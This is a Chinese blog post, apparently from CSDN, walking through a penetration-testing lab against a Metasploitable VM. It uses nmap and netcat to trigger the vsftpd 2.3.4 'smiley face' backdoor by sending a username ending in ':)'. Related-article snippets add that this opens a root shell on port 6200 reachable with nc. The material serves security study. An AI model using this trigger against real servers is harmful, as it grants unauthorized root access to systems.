实现笑脸漏洞vsftpd2.3.4

最新推荐文章于 2023-02-11 17:04:36 发布
最新推荐文章于 2023-02-11 17:04:36 发布
阅读量2.8k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yZGLHH/article/details/121887274
版权
本文介绍了如何针对靶机metasploitable进行渗透测试。靶机默认账号密码为msfadmin,IP地址为192.168.80.130。通过Kali系统进行端口扫描,发现21端口运行的是VSFTPD 2.3.4,存在笑脸漏洞。利用该漏洞,尝试通过在用户名后添加笑脸符号(如user xx:)),并随意输入密码进行攻击。同时提到了NC(netcat)工具在攻击过程中的应用。
摘要由CSDN通过智能技术生成

靶机metasploitable

默认登录账号和密码都是:msfadmin

登录后查看靶机IP:192.168.80.130

 

 打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.80.130对目标服务器进行服务及版本扫描

 

 扫描结果发现21端口是提供ftp服务的端口,服务器安装了vsftpd2.3.4版本的服务,因此可以利用笑脸漏洞来测试一下,输入命令 nmap

端口是关闭的

 另外开个窗口nc 192.168.178.129 21 连接靶机,user后随便加笑脸,密码随便 user xx:) pass xx

NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。

yZGLHH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 903
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制用户端口速度空间)
vsftpd-2.3.4服务器在ok6410开发板上的移植
alan00000的专栏
01-11 6583
老房原创修改版,在房老师教程基础上修改而成。   老房原创,转载声明,熬夜至凌晨2点捣鼓不容易啊! 我的环境飞凌OK6410开发板,arm-linux-gcc 4.3.2(我一般用的开发工具不新不旧) --------------------------------------传-说-中-的-分-割-线--------------------------------------------
vsftp2.3.4安装.rar
03-20
vsftpd2.3.4主要用途就是因为他有一个人尽皆知的漏洞笑脸漏洞vsftpd2.3.4,本工具里有自动安装脚本,可以方便快捷的执行安装操作,省去了很多时间,感兴趣的小伙伴可以进行下载。
:)笑脸漏洞
m0_62314360的博客
12-14 3572
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 打开Kali和靶机metasploitable2,在Kali中输入 netdiscover -r ip 来查看同一网段的靶机的ip 可以知道靶机的IP为192.168.38.132 输入.
vsftpd 2.3.4 带漏洞版本 可复现
09-26
然而,每个软件都有可能存在安全隐患,而vsftpd 2.3.4版本就是一个典型的例子,它携带了一个名为“笑脸漏洞”(Smiling Goat Vulnerability)的安全问题。这个漏洞允许未经身份验证的远程攻击者执行任意代码,从而对...
网络安全 批量执行vsftpd2.3.4漏洞
04-21
可以批量执行笑脸漏洞,支持多线程
vsftpd_2.3.4.zip
12-28
在这里,`vsftpd 2.3.4`作为靶机的一部分,可以用于测试笑脸漏洞的利用方法,以及验证和开发防御策略。 3. **安装.txt** - `安装.txt`文件通常包含安装或配置软件的步骤和指南。在这个场景下,它可能提供了在系统...
Linux 源代码 编译安装vsftpd-2.3.4
03-19
在Linux系统中,为了搭建一个安全且可靠的FTP...总的来说,通过编译安装vsftpd-2.3.4,您可以自定义配置,实现高度定制化的FTP服务,满足各种安全和性能需求。记得在配置过程中谨慎操作,确保系统的稳定性和安全性。
vsftpd2.3.4 POC代码
wl7979的博客
01-31 212
import socket #网络编程 urllab2 requests import time #时间 import sys #接受参数 optparser ''' 调用SOCKET库下的socket功能其(使用IP地址类型,使用传输层的协议,protocal=0) socket.AF_INET:IPV4 socket.AF_INET6:IPV6 socket.SOCK_STREAM:使用TCP传输协议 socket.SOCK_DGRAM:使用UDP传输协议 协议默
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
VSFTPD2.3.4(笑脸漏洞)复现
柠檬i的博客
10-29 1801
vsftpd2.3.4在ftp认证时,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
笑脸:)漏洞
xujing19920814的博客
10-01 242
笑脸漏洞
FTP笑脸漏洞
liangtaiwei的博客
12-13 2118
利用nmap探测漏洞笑脸漏洞 nmap --script=vuln -p 21 192.168.1.133 这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell 此时用nmap -p 6200 192.168.10.133查看连接情况 进行nc 192.168.10.133连接后 然后连接6200端口 完成漏洞利用 ...
vsftpd-2.3.4移植到8621开发板
McArthurUp2U的专栏
09-28 802
客户不知道从哪里买来块板子,让我帮他移植程序。什么gongj
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3011
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
VSFTPD v2.3.4 著名笑脸漏洞
aiwodouai的博客
12-14 2697
VSFTPD v2.3.4 著名笑脸漏洞
笑脸漏洞VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4874
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
Python制作vsftpd2.3.4的exp和poc
xiaobaihack_doge的博客
02-11 326
Python是一门优秀的脚本语言,目前在网络安全领域被广泛使用,一些exp(漏洞利用程序)程序都是由Python做的,本次我们将用Python写一个exp和poc(漏洞验证程序)。关于vsftpd2.3.4程序,这是一个在Linux上的ftp软件,允许其他设备通过ftp连接,但是这个软件存在一个高危漏洞,当用户名或密码含有:)字样时,会在本机开启一个提供shell的6200端口,因此被称为"笑脸漏洞”。exploit-db上的exp。
vsftpd 2.3.4 带漏洞版本
最新发布
06-24
vsftpd 2.3.4 是一个包含漏洞FTP服务器软件。这个漏洞版本的FTP服务器软件可以让攻击者远程攻击FTP服务器,从而访问FTP服务器上的敏感数据。这个漏洞是由于软件中存在的安全缺陷造成的。攻击者可以通过发送特殊...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值